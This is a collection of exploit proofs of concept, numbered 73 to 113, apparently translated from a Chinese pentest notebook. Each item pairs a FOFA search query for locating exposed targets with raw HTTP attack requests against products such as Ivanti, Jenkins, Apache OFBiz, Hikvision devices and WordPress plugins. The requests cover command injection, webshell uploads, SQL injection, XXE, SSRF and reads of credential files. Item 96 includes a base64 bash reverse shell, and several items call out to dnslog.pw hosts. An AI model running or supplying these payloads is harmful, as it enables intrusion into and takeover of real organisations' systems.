S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E


73. GeoServer wms remote code execution
FOFA:icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD


74. 致远M3-server 6_1sp1 deserialization RCE
FOFA:title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA:app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. 新开普 campus mobile service management platform service.action remote command execution
FOFA:title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
"command": "GetFZinfo",
"UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x


77. F22 garment management software UploadHandler.ashx arbitrary file upload
FOFA:body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--


78. pkpmbs construction quality supervision system FileUpload.ashx file upload
FOFA:icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x


79. BYTEVALUE 百为 traffic-control router remote command execution
FOFA:BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. 速达天耀 software DesignReportSave.jsp arbitrary file upload
FOFA:app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>


GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip


81. 宇视科技 (Uniview) video surveillance main-cgi password disclosure
FOFA:app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪LOGBASE operations security management system test_qrcode_b remote command execution
FOFA:app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost


83. JeecgBoot testConnection remote command execution
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}


85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA:body="sysaid-logo-dark-green.png"
The exploit request is as follows; it writes a Godzilla (哥斯拉) webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD
Echo URL: http://x.x.x.x/userfiles/index.jsp

86. Japanese tosei self-service laundry machine RCE
FOFA:body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping


87. 安恒明御 security gateway aaa_local_web_preview file upload
FOFA:title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php

88. 安恒明御 security gateway aaa_portal_auth_config_reset remote command execution
FOFA:title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

/astdfkhl.php

89. 致远互联FE collaborative office platform editflow_manager SQL injection
FOFA:title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+


90. 海康威视 (Hikvision) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA:icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig


91. 海康威视 (Hikvision) integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA:title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


92. 海康威视 (Hikvision) operations management center session command execution
Fastjson command execution
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD


93. Qi'anxin Wangshen SecGate3600 firewall app_av_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--


GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. Qi'anxin Wangshen SecGate3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--


GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache-OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 value of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated payload into the POC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

99. Ncast (盈可视) HD smart recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>
103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 encoding of the XML document below:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host:192.168.0.1
Content-Length:41
Accept:application/json,text/javascript,*/*;q=0.01
X-Requested-with: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
Content-Type: application/x-www-form-urlencoded:charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding:gzip,deflate
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7
Connection:close

{
"topicurl":"getSysStatusCfg",
"token":""
}
105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: (replace with your own token)
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'

POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0


ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
[COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

110. GoAnywhere MFT unauthenticated administrator creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

111. WordPress Plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

112. WordPress Plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
